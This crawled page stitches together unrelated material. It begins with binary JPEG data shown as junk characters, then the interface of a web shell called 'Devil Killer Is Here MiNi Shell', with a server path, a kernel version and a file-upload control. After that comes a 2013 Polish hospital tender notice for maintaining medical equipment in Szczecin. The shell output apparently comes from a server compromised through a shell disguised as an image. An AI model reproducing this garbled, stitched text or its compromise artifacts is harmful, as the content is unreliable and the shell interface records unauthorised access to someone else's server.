JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130614/230254-N-2013.html

<p class="kh_header"><b>Szczecin: Świadczenie usługi polegającej na wykonaniu stałego nadzoru technicznego, okresowych przeglądów technicznych, konserwacji i naprawy aparatury medycznej (sprzętu, urządzeń) znajdującej się SPS ZOZ Zdroje  - II postępowanie</b><br>
<b>Numer ogłoszenia: 230254 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Specjalistyczny Zakład Opieki Zdrowotnej "ZDROJE" , ul. Mączna 4, 70-780 Szczecin, woj. zachodniopomorskie, tel. 091 8806260, faks 091 8806203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-zdroje.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi polegającej na wykonaniu stałego nadzoru technicznego, okresowych przeglądów technicznych, konserwacji i naprawy aparatury medycznej (sprzętu, urządzeń) znajdującej się SPS ZOZ Zdroje  - II postępowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na wykonywaniu stałego nadzoru technicznego, okresowych przeglądów technicznych, konserwacji i naprawie aparatury medycznej (sprzętu, urządzeń) znajdującej się w Samodzielnym Publicznym Specjalistycznym Zakładzie Opieki Zdrowotnej Zdroje - II postępowanie.
Przedmiot zamówienia jest podzielony na 30 części zwanych pakietami:
Nr 1.1	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Babylog w Szpitalu przy ul. Mącznej 4
Nr 1.2	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Newport w Szpitalu przy ul. Mącznej 4
Nr 1.3	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Puritan Bennet w Szpitalu przy ul. Mącznej 4
Nr 1.4	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Sechrist w Szpitalu przy ul. Mącznej 4
Nr 1.5	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Siemens w Szpitalu przy ul. Mącznej 4
Nr 1.6	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Viasys w Szpitalu przy ul. Mącznej 4
Nr 1.7	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Wave w Szpitalu przy ul. Mącznej 4
Nr 1.8	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- aparaty do znieczuleń - Titus w Szpitalu przy ul. Mącznej 4
Nr 1.9	Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- aparaty do znieczuleń - Datex w Szpitalu przy ul. Mącznej 4
Nr 1.10	Stały nadzór techniczny, konserwacja, przegląd i naprawa wiertarek w Szpitalu przy ul. Św. Wojciecha 7;
Nr 1.11	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt do dializy w Szpitalu przy ul. Wojciecha 7
Nr 1.12	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - USG w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Św. Wojciecha 7
Nr 1.13	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - analizatory w Szpitalu przy ul. Mącznej 4
Nr 1.14	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt pulmonologiczny różny w Szpitalu przy ul. Mącznej 4, w Poradni Specjalistycznej przy ul. Słowackiego 19,  w Szpitalu przy ul. Wojciecha 7
Nr 1.15	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - laparoskopy, histeroskopy w Szpitalu przy ul. Mącznej 4
Nr 1.16	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - gastroskopy, kolonoskopy w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7
Nr 1.17	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt różny w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7
Nr 1.18	Stały nadzór techniczny, konserwacja, przegląd i naprawa - Maceratory w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7
Nr 1.19	Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt okulistyczny w Szpitalu przy ul. Mącznej 4, w Poradni Specjalistycznej przy ul. Słowackiego 19,  w Szpitalu przy ul. Wojciecha 7
Nr 1.20	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt rtg- Philips w Szpitalu przy ul. Mącznej 4
Nr 1.21	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt rtg - TMS w Szpitalu przy ul. Mącznej 4
Nr 1.22	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Mammograf w szpitalu przy ul. Mącznej 4
Nr 1.23	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - VISION w Szpitalu przy ul. Mączna 4
Nr 1.24	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Siemens w Szpitalu przy ul. Mącznej 4 oraz przy ul. Św. Wojciecha 7
Nr 1.25	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - BENNET w szpitalu przy ul. Św. Wojciecha 7
Nr 1.26	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - strzykawka automatyczna w szpitalu przy ul. Mącznej 4
Nr 1.27	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - ARCOVIS, COMPACT, HELIODENT w szpitalu przy ul. Św. Wojciecha 7
Nr 1.28	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - OPERA w szpitalu przy ul. Św. Wojciecha
Nr 1.29	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - DRS w szpitalu przy ul. Św. Wojciecha 7
Nr 1.30	Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Wywoływarki, Ciemnia Automatyczna w szpitalu przy ul. Św. Wojciecha 7.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w trybie art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, możliwość udzielenia zamówienia uzupełniającego do 30 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 30.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem potwierdzenia spełniania warunku, że wykonawca posiada uprawnienia do wykonywania przedmiotu zamówienia, Wykonawca zobowiązany jest złożyć następujący dokument- pisemne oświadczenie na załączniku nr 3; Ocena spełniania ww. warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu spełniania tego warunku, Wykonawca jest zobowiązany posiadać należycie wykonane (a w przypadku świadczeń okresowych lub ciągłych również wykonywane) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - dwie usługi podobne do objętych przedmiotem zamówienia. Za usługę podobną Zamawiający uzna usługi w zakresie konserwacji urządzeń medycznych w jednostkach służby zdrowia, z których co najmniej jedna jest o wartości 10 000,00 zł. Celem potwierdzenia spełniania ww. warunku, Wykonawca zobowiązany jest złożyć następujący dokument - pisemne oświadczenie na załączniku nr 3; Ocena spełniania ww. warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem potwierdzenia spełniania warunku, że Wykonawca dysponuje odpowiednim potencjałem technicznym, Wykonawca zobowiązany jest złożyć następujący dokument pisemne oświadczenie na załączniku nr 3 Ocena spełniania ww. warunków udziału w postępowaniu zostanie dokonana na podstawie ww. dokumentu złożonego przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu spełniania tego warunku, Wykonawca jest zobowiązany dysponować (lub że będzie dysponował) osobami legitymującymi się kwalifikacjami zawodowymi i doświadczeniem niezbędnym do wykonania zamówienia, z co najmniej pięcioletnim doświadczeniem zawodowym tym zakresie oraz osobami posiadającymi wymagane przepisami prawa uprawnienia

Celem potwierdzenia spełniania ww. warunku, Wykonawca zobowiązany jest złożyć następujące dokumenty: 
a)	pisemne oświadczenie na załączniku nr 3;
b)	wypełniony załącznik nr 4 Zakres powierzonych prac podwykonawcom, z którego będzie wynikać, jaką część zamówienia wykonawca powierzy podwykonawcom. W przypadku braku powierzenia części prac podwykonawcom, należy złożyć podpisany załącznik nr 4 z dopiskiem NIE DOTYCZY.
c)	pisemne oświadczenie o posiadaniu uprawnień na załączniku nr 5.
Ocena spełniania ww. warunków udziału w postępowaniu zostanie dokonana na podstawie ww. dokumentu złożonego przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu spełniania tego warunku, Wykonawca jest zobowiązany posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę- dla każdego pakietu.- na sumę ubezpieczenia nie niższą niż 5 000,00 zł Uwaga: W przypadku, gdy wykonawca ubiega się o udzielenie zamówienia w kilku pakietach to ubezpieczenie musi obejmowało łączną sumę dot. tych pakietów, w których wykonawca będzie składał ofertę. Celem potwierdzenia spełniania ww. warunku, Wykonawca zobowiązany jest złożyć następujący dokument - pisemne oświadczenie na załączniku nr 3; Ocena spełniania ww. warunków udziału w postępowaniu zostanie dokonana na podstawie ww. dokumentu złożonego przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">pisemne oświadczenie wykonawcy - wypełniony załącznik nr 6</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1 - oferta cenowa; Załącznik nr 1.1 - 1.30 - wykaz aparatury medycznej (sprzętu i urządzeń); Załącznik nr 2 - oświadczenie o braku podstaw do wykluczenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy wymaga dla swej ważności formy pisemnej.
2.	Zmiana umowy wymaga zgody obu stron i może nastąpić tylko w drodze podpisania aneksu do umowy w następujących przypadkach:
1)	gdy podczas realizacji umowy wystąpią nieprzewidywalne zdarzenie lub okoliczności, które uniemożliwią zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie;
2)	w przypadku nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron rażącą stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy;
3)	zmiana jest korzystna dla Zamawiającego, w szczególności dotyczy obniżenia ceny (wynagrodzenia);
4)	gdy Zamawiający rozszerzy lub zrezygnuje w części usług objętych przedmiotem zamówienia, w wyniku prowadzonych remontów, modernizacji, przebudowy, zmian organizacyjnych dopuszcza odpowiednią zmianę wysokości wynagrodzenia wykonawcy.
5)	w przypadku, o którym mowa w §2 ust. 1, dopuszcza odpowiednią zmianę wysokości wynagrodzenia wykonawcy;
6)	gdy Wykonawca powierzy część obowiązków osobom/ podmiotom innym niż podane w ofercie (załącznik nr 5 Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia). Zmiana takka jest dopuszczalna tylko pod warunkiem, że osoba/podmiot będzie dysponować taką samą wiedzą, kwalifikacjami, doświadczeniem, i możliwościami, co osoba zgłoszona przez wykonawcę wcześniej w ofercie
3.	Postanowienia ust. 2 nie oznaczają deklaracji zgody Zamawiającego na dokonanie zmiany umowy w wymienionych przypadkach, względnie na podjęcie rokowań idących w tym kierunku. Zgoda zależy tu od swobodnej decyzji Zamawiającego. W każdym przypadku Zamawiający może odmówić zmiany lub podjęcia rokowań bez podania przyczyn, lub nie składać żadnych oświadczeń w tym względzie z równorzędnym skutkiem jak brak zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-zdroje.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPS ZOZ ZDROJE, ul. Mączna 4, 70-780 Szczecin, Pawilon 11 - Budynek Administracji, pokój nr 12 i 13, w godzinach 08:00 do 14:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2013 godzina 11:00, miejsce: SPS ZOZ ZDROJE, ul. Mączna 4, 70-780 Szczecin Kancelaria Pawilon numer 5, w godzinach 07:30 do 15:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1.1 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Babylog w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Babylog w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.10.00-2, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 1.2 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Newport w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Newport w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 1.3 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Puritan Bennet w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Puritan Bennet w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 1.4 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Sechrist w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Sechrist w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
